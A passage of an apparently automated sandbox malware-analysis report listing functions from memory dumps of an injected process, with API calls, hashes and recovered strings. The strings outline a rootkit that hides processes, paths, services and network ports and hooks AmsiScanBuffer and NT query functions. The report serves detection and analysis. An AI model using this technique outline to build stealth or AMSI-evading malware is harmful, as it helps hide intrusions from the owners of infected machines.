Function 000001F1197D1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F1197D1D69
HeapAlloc.KERNEL32 ref: 000001F1197D1D77
GetProcessHeap.KERNEL32 ref: 000001F1197D1D9C
HeapFree.KERNEL32 ref: 000001F1197D1DAA

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 57d18717c3eb28c6aaaf322a3c44b8529fde4a4ab9707f3c45096237bd570314
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 3B118B22A05B95E1EA14CB7AA8042A967F2FB88FC0F984038DF5E57725EF38C4468700

Function 000001F119D5D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001F119D5D220: HeapAlloc.KERNEL32(?,?,00000000,000001F119D5C987), ref: 000001F119D5D275

Part of subcall function 000001F119D60EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001F119D60EEB

FindFirstFileExW.KERNEL32 ref: 000001F119D5DB99

Part of subcall function 000001F119D5D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F119D5674A), ref: 000001F119D5D2B6
Part of subcall function 000001F119D5D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F119D5674A), ref: 000001F119D5D2C0

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 5bde14d55d421701dfee4ad0f02ebed0ae7c37834e1d17cabc49880fdff08724
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: B881A132308686E5FF20DB32A5403FAA7B6E785B94F944135AFBA57799DA38C042C710

Function 000001F1197DD894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001F1197DD220: HeapAlloc.KERNEL32(?,?,00000000,000001F1197DC987), ref: 000001F1197DD275

Part of subcall function 000001F1197E0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001F1197E0EEB

FindFirstFileExW.KERNEL32 ref: 000001F1197DDB99

Part of subcall function 000001F1197DD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F1197D674A), ref: 000001F1197DD2B6
Part of subcall function 000001F1197DD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F1197D674A), ref: 000001F1197DD2C0

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: fc6ef04727d992a463fda2857fa008987b98827e80ae3e0f68f84347f44641d3
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: A081C433308682E5EB209B71A5413FEA7D6EB85BD4F848135EFBA07B95DA38C4458B00

Function 000001F1197923F0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 995d6e0814aaf086324ccd34921310a388e86cc814143c0920eaa98d1b8a5a2b
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 05B19F32218692E2EB58AF35D4507F963A6FB44BE4F945026DF2A53B94EF35CC48CB40

Function 000001F11979CE18 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction ID: 04dacc53ca35ba80830cab19afac5b74a106f40c916a74451122b1f594fc93d9
Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction Fuzzy Hash: 12A1AA32718682E5FF209B7594443FD6BA2EB41BE4F984135EF6F17695EA38C44ACB00

Function 000001F11979CC94 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction ID: 60795e39b2bbd36db3f53e05dedd32cb6ab8b678fd54419a8b8500375e7d6a8c
Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction Fuzzy Hash: 2581A632718641E5EE20DF31A4403FA6B92EB85BE4F984535EFBF57795EA38C1458B00

Function 000001F1197A2AF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction ID: c2eaea289795deaca185a74cf0f46bccb55d58a7a6f8ac3798cc782980d5e5cf
Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction Fuzzy Hash: 1C1165B161C592D7F7A98F39A4513B93792FB083C4FD48039D66B86A94E73DC4948F00

Function 000001F119D51724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F119D5172F
HeapAlloc.KERNEL32 ref: 000001F119D5173E

Part of subcall function 000001F119D51264: GetProcessHeap.KERNEL32 ref: 000001F119D5126A
Part of subcall function 000001F119D51264: HeapAlloc.KERNEL32 ref: 000001F119D51279
Part of subcall function 000001F119D51264: GetProcessHeap.KERNEL32 ref: 000001F119D51293
Part of subcall function 000001F119D51264: HeapAlloc.KERNEL32 ref: 000001F119D512A4

Part of subcall function 000001F119D51000: GetProcessHeap.KERNEL32 ref: 000001F119D51006
Part of subcall function 000001F119D51000: HeapAlloc.KERNEL32 ref: 000001F119D51015
Part of subcall function 000001F119D51000: GetProcessHeap.KERNEL32 ref: 000001F119D51028
Part of subcall function 000001F119D51000: HeapAlloc.KERNEL32 ref: 000001F119D51037

RegOpenKeyExW.ADVAPI32 ref: 000001F119D517AE
RegOpenKeyExW.ADVAPI32 ref: 000001F119D517DB
RegCloseKey.ADVAPI32 ref: 000001F119D517F5
RegOpenKeyExW.ADVAPI32 ref: 000001F119D51815
RegCloseKey.ADVAPI32 ref: 000001F119D51830
RegOpenKeyExW.ADVAPI32 ref: 000001F119D51850
RegCloseKey.ADVAPI32 ref: 000001F119D5186B
RegOpenKeyExW.ADVAPI32 ref: 000001F119D5188B
RegCloseKey.ADVAPI32 ref: 000001F119D518A6
RegOpenKeyExW.ADVAPI32 ref: 000001F119D518C6
RegCloseKey.ADVAPI32 ref: 000001F119D518E1
RegOpenKeyExW.ADVAPI32 ref: 000001F119D51901
RegCloseKey.ADVAPI32 ref: 000001F119D5191C
RegOpenKeyExW.ADVAPI32 ref: 000001F119D5193C
RegCloseKey.ADVAPI32 ref: 000001F119D51957
RegOpenKeyExW.ADVAPI32 ref: 000001F119D51977
RegCloseKey.ADVAPI32 ref: 000001F119D51992
RegCloseKey.ADVAPI32 ref: 000001F119D5199C

Part of subcall function 000001F119D512B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001F119D51315
Part of subcall function 000001F119D512B8: GetProcessHeap.KERNEL32 ref: 000001F119D51323
Part of subcall function 000001F119D512B8: HeapAlloc.KERNEL32 ref: 000001F119D51334
Part of subcall function 000001F119D512B8: RegEnumValueW.ADVAPI32 ref: 000001F119D51393
Part of subcall function 000001F119D512B8: GetProcessHeap.KERNEL32 ref: 000001F119D513DB
Part of subcall function 000001F119D512B8: HeapAlloc.KERNEL32 ref: 000001F119D513E9
Part of subcall function 000001F119D512B8: GetProcessHeap.KERNEL32 ref: 000001F119D51406
Part of subcall function 000001F119D512B8: HeapFree.KERNEL32 ref: 000001F119D51414
Part of subcall function 000001F119D512B8: lstrlenW.KERNEL32 ref: 000001F119D5141D
Part of subcall function 000001F119D512B8: GetProcessHeap.KERNEL32 ref: 000001F119D5142B
Part of subcall function 000001F119D512B8: HeapAlloc.KERNEL32 ref: 000001F119D51439

Strings

service_names, xrefs: 000001F119D518BF
tcp_local, xrefs: 000001F119D518FA
startup, xrefs: 000001F119D517D1
tcp_remote, xrefs: 000001F119D51935
udp, xrefs: 000001F119D51970
paths, xrefs: 000001F119D51884
SOFTWARE\$cnt-config, xrefs: 000001F119D5178E
process_names, xrefs: 000001F119D51849
pid, xrefs: 000001F119D5180E

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2609720707
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: d22b6d6e05e4c31630e0fbe9ec1c364e3ef28a76ba41a4809c66929c17ff7acb
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: E4711A36618A5AE6EF109F75E8506E92376FB85B88FC05221DF6E57B28DE34C444C780

Function 000001F1197D1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F1197D172F
HeapAlloc.KERNEL32 ref: 000001F1197D173E

Part of subcall function 000001F1197D1264: GetProcessHeap.KERNEL32 ref: 000001F1197D126A
Part of subcall function 000001F1197D1264: HeapAlloc.KERNEL32 ref: 000001F1197D1279
Part of subcall function 000001F1197D1264: GetProcessHeap.KERNEL32 ref: 000001F1197D1293
Part of subcall function 000001F1197D1264: HeapAlloc.KERNEL32 ref: 000001F1197D12A4

Part of subcall function 000001F1197D1000: GetProcessHeap.KERNEL32 ref: 000001F1197D1006
Part of subcall function 000001F1197D1000: HeapAlloc.KERNEL32 ref: 000001F1197D1015
Part of subcall function 000001F1197D1000: GetProcessHeap.KERNEL32 ref: 000001F1197D1028
Part of subcall function 000001F1197D1000: HeapAlloc.KERNEL32 ref: 000001F1197D1037

RegOpenKeyExW.ADVAPI32 ref: 000001F1197D17AE
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D17DB
RegCloseKey.ADVAPI32 ref: 000001F1197D17F5
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1815
RegCloseKey.ADVAPI32 ref: 000001F1197D1830
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1850
RegCloseKey.ADVAPI32 ref: 000001F1197D186B
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D188B
RegCloseKey.ADVAPI32 ref: 000001F1197D18A6
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D18C6
RegCloseKey.ADVAPI32 ref: 000001F1197D18E1
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1901
RegCloseKey.ADVAPI32 ref: 000001F1197D191C
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D193C
RegCloseKey.ADVAPI32 ref: 000001F1197D1957
RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1977
RegCloseKey.ADVAPI32 ref: 000001F1197D1992
RegCloseKey.ADVAPI32 ref: 000001F1197D199C

Part of subcall function 000001F1197D12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001F1197D1315
Part of subcall function 000001F1197D12B8: GetProcessHeap.KERNEL32 ref: 000001F1197D1323
Part of subcall function 000001F1197D12B8: HeapAlloc.KERNEL32 ref: 000001F1197D1334
Part of subcall function 000001F1197D12B8: RegEnumValueW.ADVAPI32 ref: 000001F1197D1393
Part of subcall function 000001F1197D12B8: GetProcessHeap.KERNEL32 ref: 000001F1197D13DB
Part of subcall function 000001F1197D12B8: HeapAlloc.KERNEL32 ref: 000001F1197D13E9
Part of subcall function 000001F1197D12B8: GetProcessHeap.KERNEL32 ref: 000001F1197D1406
Part of subcall function 000001F1197D12B8: HeapFree.KERNEL32 ref: 000001F1197D1414
Part of subcall function 000001F1197D12B8: lstrlenW.KERNEL32 ref: 000001F1197D141D
Part of subcall function 000001F1197D12B8: GetProcessHeap.KERNEL32 ref: 000001F1197D142B
Part of subcall function 000001F1197D12B8: HeapAlloc.KERNEL32 ref: 000001F1197D1439

Strings

tcp_local, xrefs: 000001F1197D18FA
service_names, xrefs: 000001F1197D18BF
paths, xrefs: 000001F1197D1884
SOFTWARE\$cnt-config, xrefs: 000001F1197D178E
udp, xrefs: 000001F1197D1970
process_names, xrefs: 000001F1197D1849
tcp_remote, xrefs: 000001F1197D1935
startup, xrefs: 000001F1197D17D1
pid, xrefs: 000001F1197D180E

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2609720707
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: ae65c8efcccab0ff312162ab4974f2439749243774723297fe27fa12d9842dd1
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: ED711936718A56E5EB10DF75E8506EC23A6FF85BCCF805121EA6E57B28EE34C548CB40

Function 000001F119D51E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001F119D51E7F

Part of subcall function 000001F119D522A8: GetModuleHandleA.KERNEL32(?,?,?,000001F119D51EB1), ref: 000001F119D522C0
Part of subcall function 000001F119D522A8: GetProcAddress.KERNEL32(?,?,?,000001F119D51EB1), ref: 000001F119D522D1

CreateThread.KERNEL32 ref: 000001F119D52043
TlsAlloc.KERNEL32 ref: 000001F119D52049
TlsAlloc.KERNEL32 ref: 000001F119D52055
TlsAlloc.KERNEL32 ref: 000001F119D52061
TlsAlloc.KERNEL32 ref: 000001F119D5206D
TlsAlloc.KERNEL32 ref: 000001F119D52079
TlsAlloc.KERNEL32 ref: 000001F119D52085

Strings

NtEnumerateKey, xrefs: 000001F119D51F19
amsi.dll, xrefs: 000001F119D52019
advapi32.dll, xrefs: 000001F119D51F57, 000001F119D51F78
NtResumeThread, xrefs: 000001F119D51EC2
AmsiScanBuffer, xrefs: 000001F119D52012
EnumServicesStatusExW, xrefs: 000001F119D51F71, 000001F119D51F92
ntdll.dll, xrefs: 000001F119D51E8D
PdhGetFormattedCounterArrayW, xrefs: 000001F119D51FF1
NtDeviceIoControlFile, xrefs: 000001F119D51FB6
EnumServiceGroupW, xrefs: 000001F119D51F50
NtQueryDirectoryFile, xrefs: 000001F119D51EDF
NtQueryDirectoryFileEx, xrefs: 000001F119D51EFC
sechost.dll, xrefs: 000001F119D51F99
NtEnumerateValueKey, xrefs: 000001F119D51F36
NtQuerySystemInformation, xrefs: 000001F119D51EA5
pdh.dll, xrefs: 000001F119D51FD7, 000001F119D51FF8
PdhGetRawCounterArrayW, xrefs: 000001F119D51FD0

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 81e9f1b84ff7ed2c699535f6382287ce68a3fdff22e8eda46197c6b8a39ffdc2
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 915149B4918A8FF5FE04EBB5E8916E86733B750748FC04632A72B06565DE78825AC780

Function 000001F119D512B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F119D51315
GetProcessHeap.KERNEL32 ref: 000001F119D51323
HeapAlloc.KERNEL32 ref: 000001F119D51334
RegEnumValueW.ADVAPI32 ref: 000001F119D51393

Part of subcall function 000001F119D51530: StrCmpIW.SHLWAPI ref: 000001F119D51561

GetProcessHeap.KERNEL32 ref: 000001F119D513DB
HeapAlloc.KERNEL32 ref: 000001F119D513E9
GetProcessHeap.KERNEL32 ref: 000001F119D51406
HeapFree.KERNEL32 ref: 000001F119D51414
lstrlenW.KERNEL32 ref: 000001F119D5141D
GetProcessHeap.KERNEL32 ref: 000001F119D5142B
HeapAlloc.KERNEL32 ref: 000001F119D51439
StrCpyW.SHLWAPI ref: 000001F119D5145B
GetProcessHeap.KERNEL32 ref: 000001F119D51472
HeapFree.KERNEL32 ref: 000001F119D51480

Strings

d, xrefs: 000001F119D51356

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: e22bcaf00fbac896401bfcd8aa25f3a51863f75f9e621ff7936428a07aa9195c
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: B8512C32218B89E6EB24CF72E4483AA77A2F789F98F844124DB5A07758DF3CC445C740

Function 000001F1197D12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F1197D1315
GetProcessHeap.KERNEL32 ref: 000001F1197D1323
HeapAlloc.KERNEL32 ref: 000001F1197D1334
RegEnumValueW.ADVAPI32 ref: 000001F1197D1393

Part of subcall function 000001F1197D1530: StrCmpIW.SHLWAPI ref: 000001F1197D1561

GetProcessHeap.KERNEL32 ref: 000001F1197D13DB
HeapAlloc.KERNEL32 ref: 000001F1197D13E9
GetProcessHeap.KERNEL32 ref: 000001F1197D1406
HeapFree.KERNEL32 ref: 000001F1197D1414
lstrlenW.KERNEL32 ref: 000001F1197D141D
GetProcessHeap.KERNEL32 ref: 000001F1197D142B
HeapAlloc.KERNEL32 ref: 000001F1197D1439
StrCpyW.SHLWAPI ref: 000001F1197D145B
GetProcessHeap.KERNEL32 ref: 000001F1197D1472
HeapFree.KERNEL32 ref: 000001F1197D1480

Strings

d, xrefs: 000001F1197D1356

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: ea07e1348114554774d4e6d9953e307e7de4bf806670ae48d21ef2e063e4e9eb
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 29512D72218B95E6EB14CF72E4443AA77A2FB89FD8F844124DB5A07758EF3CC0498B00

Function 000001F119D5EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001F119D5F34A,?,?,00000000,000001F119D5F2CD), ref: 000001F119D5EFF5
GetLastError.KERNEL32(?,?,00000000,000001F119D5F2CD), ref: 000001F119D5F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001F119D5F2CD), ref: 000001F119D5F049
VirtualProtect.KERNEL32 ref: 000001F119D5F0A5
VirtualProtect.KERNEL32 ref: 000001F119D5F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001F119D5F2CD), ref: 000001F119D5F11A
GetProcAddress.KERNEL32(?,?,00000000,000001F119D5F2CD), ref: 000001F119D5F126

Strings

api-ms-, xrefs: 000001F119D5F01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001F119D5F157, 000001F119D5F165
ext-ms-, xrefs: 000001F119D5F02E

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: bc8666fc3385e0109b51b31495b208f43bcc744bc676d9d3b4dde94018c610eb
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 3B516C31709A4AE1FE149B7AA9007F92262AB59BB0FD807359F3B473D0EF38D4458750

Function 000001F1197DEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001F1197DF34A,?,?,00000000,000001F1197DF2CD), ref: 000001F1197DEFF5
GetLastError.KERNEL32(?,?,00000000,000001F1197DF2CD), ref: 000001F1197DF007
